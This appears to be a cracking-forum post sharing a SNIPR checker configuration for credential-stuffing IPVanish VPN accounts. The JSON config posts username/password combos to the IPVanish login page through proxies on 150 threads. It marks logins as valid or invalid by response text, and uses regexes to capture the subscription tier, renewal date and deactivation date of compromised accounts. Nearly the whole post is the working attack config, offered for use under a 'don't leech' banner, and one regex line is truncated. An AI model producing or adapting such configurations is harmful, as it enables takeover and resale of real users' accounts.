lol32
Backend Alchemist
LEVEL 1
300 XP
Email/User: Email Last checked: Day of posting Config:
SNIPR Website : SNIPR.LOL
DON'T LEECH , I SEE MANY LEECHERS AND I WILL REPORT THIS TIME!
Code:
{
"General": {
"name": "IPVanish",
"proxyType": "Proxies",
"comboType": 0,
"threads": 150
},
"Requests": [
{
"type": "CaptureProcessing",
"actionUrl": "https://account.ipvanish.com/index.php",
"method": "POST",
"userAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"contentType": "application/x-www-form-urlencoded",
"accept": "*/*",
"referer": "",
"postData": "username=<USER>&password=<PASS>&webLogin=Login",
"successKeys": [
"Your current account information"
],
"failureKeys": [
"Sorry, invalid credentials.",
"reactivate your service"
],
"non200": false,
"captureParse": {
"prefix": "[SNIPR] ",
"type": "Regex",
"patterns": [
{
"pattern": 'Current Tier.*\\s*<span class="profile_label">(.*)<\/span>',
"returnString": "+1+ Subscription, "
},
{
"pattern": 'Renewal Date.*\\s*<span class="profile_label">(.*)<\/span>',
"returnString": "Renews on +1+, "
},
{
"pattern": '<span class="profile_label">(.*)<span style="display:block; float:right;">
"returnString": "Renewal Type +1+"
},
{
"pattern": 'Deactivation Date.*\\s*<span class="profile_label">(.*)<\/span>',
"returnString": "Deactivates On +1+"
}
]
}
}
]
}
DON'T LEECH , I SEE MANY LEECHERS AND I WILL REPORT THIS TIME!